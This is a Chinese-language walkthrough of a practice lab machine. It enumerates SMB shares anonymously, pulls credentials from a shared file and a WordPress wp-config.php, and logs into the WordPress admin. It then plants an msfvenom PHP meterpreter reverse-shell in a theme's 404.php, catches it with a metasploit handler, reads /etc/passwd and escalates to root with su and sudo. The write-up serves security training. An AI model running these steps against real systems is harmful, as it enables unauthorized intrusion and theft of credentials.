SMB信息泄露

攻击机IP192.168.43.138

靶机IP192.168.43.101

 

0x00 SMB介绍

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(intel)1987年制定的协议,主要是作为Microsoft网络的通讯协议,后来Linux移植了SMB,并称为samba

SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445

SMB信息泄露 第1张

SMB协议,计算机可以访问网络资源,下载对应的资源文件

 

0x01 信息探测

对于只是给定一个对应IP地址的靶场机器,我们需要使用对其进行扫描,探测开放的服务。

渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限

Nmap -sV IP 挖掘开放服务信息

Nmap -A -v -T4 IP 挖掘靶场全部信息

SMB信息泄露 第2张

0x02 分析探测结果

每一个服务于对应计算机的一个端口,用来进行通信。通常端口0~1023端口,在扫描结果中查找特殊端口

针对特殊端口进行探测,尤其对开发大端口的http服务进行排查

 

0x03 针对SMB协议弱点分析

1. 针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,查看下载

Smbclient -L IP

Smbclient \\IP\$\share

Get 敏感文件

1. 针对SMB协议远程溢出漏洞进行分析

Searchsploit samba版本号

 

Smbclient -L 192.168.43.101

SMB信息泄露 第3张

可以看到有三个信息

Print$ 共享设备 也就是共享对应打印机

Share$ 表示共享的文件夹

IPC$ 表示一个空链接 意思是我不需要用户名就可以登录的 web服务器

SMB信息泄露 第4张

print并没有权限

所以尝试share然后使用空密码登录发现可以登录

SMB信息泄露 第5张

SMB信息泄露 第6张

空连接并未利用价值

 

所以回到Share

SMB信息泄露 第7张

然后Get deets.txt

SMB信息泄露 第8张

发现有一个password12345

Cd wordpress 可以看到有一个wordpress站点

SMB信息泄露 第9张

并且可以看到有一个wp-config.php配置文件 一般来说配置文件都存放着账号密码等敏感信息

SMB信息泄露 第10张

SMB信息泄露 第11张

数据库信息

SMB信息泄露 第12张

那么可以尝试登陆mysql数据库

SMB信息泄露 第13张

无法登陆

 

那么尝试使用该用户名和密码登陆ssh

SMB信息泄露 第14张

同样尝试失败

 

那么查找SMb远程溢出漏洞 searchsploit+smb版本号

SMB信息泄露 第15张

139端口的并无可利用信息

 

445也无用漏洞

SMB信息泄露 第16张

0x03 针对HTTP协议弱点分析

1. 浏览器查看网站

2. 使用dirb nikto探测

3. 寻找突破点,目标登陆后台,上传webshell

Dirb http://192.168.43.101

SMB信息泄露 第17张

发现了一个wordpress/wp-admin的目录

SMB信息泄露 第18张

输入之前在wp-config.php文件中看到的账号和密码登陆网站后台

可以看到已经登陆了wordpress网站后台了

SMB信息泄露 第19张

针对WordPress就可以使用固定的方法来上传webshell

 

0x04 制作webshellwebshell

这里使用msfvenommetasploit

Msfvenom -p php/meterpreter/reverse_tcp lhost = IP lport = 444 -f raw >/root/Desktop/shell.php

或者msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=4444 -f raw

SMB信息泄露 第20张

生成完成后从注释符后开始复制

启动监听

Msf>user exploit/multi/handler

Msf exploit(handler)>set payload php/meterpreter/reverse_tcp

Msf exploit(handler)>set lhost 攻击机IP

Msf exploit(handler)>set lport 4444

Msf exploit(handler)>run

SMB信息泄露 第21张

SMB信息泄露 第22张

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。执行webshell(访问具有webshellphp页面)

获得反弹的shell

wordpress上传点theme 404.php

执行http://靶场IP/wordpress/wp-content/themes/twentyfouteen/404.php

SMB信息泄露 第23张

然后点击下面的update file上传即可

SMB信息泄露 第24张

SMB信息泄露 第25张

访问后查看metasploit

SMB信息泄露 第26张

拿到了一个会话

SMB信息泄露 第27张

查看当前用户权限

 

接下来需要

优化终端:python -c import pty;pty.spawn(/bin/bash)

SMB信息泄露 第28张

查找敏感信息 提升root权限 查看flag

查找用户名:cat /etc/passwd

SMB信息泄露 第29张

SMB信息泄露 第30张

查找密码:在共享目录下的敏感文件,提升权限

Su 用户名

SMB信息泄露 第31张

SMB信息泄露 第32张

使用sudo su

提升到root权限

SMB信息泄露 第33张

Cd root目录

ls查看当前目录下的文件后 使用cat查看

由于靶场原有 查看proof.txt即可

SMB信息泄露 第34张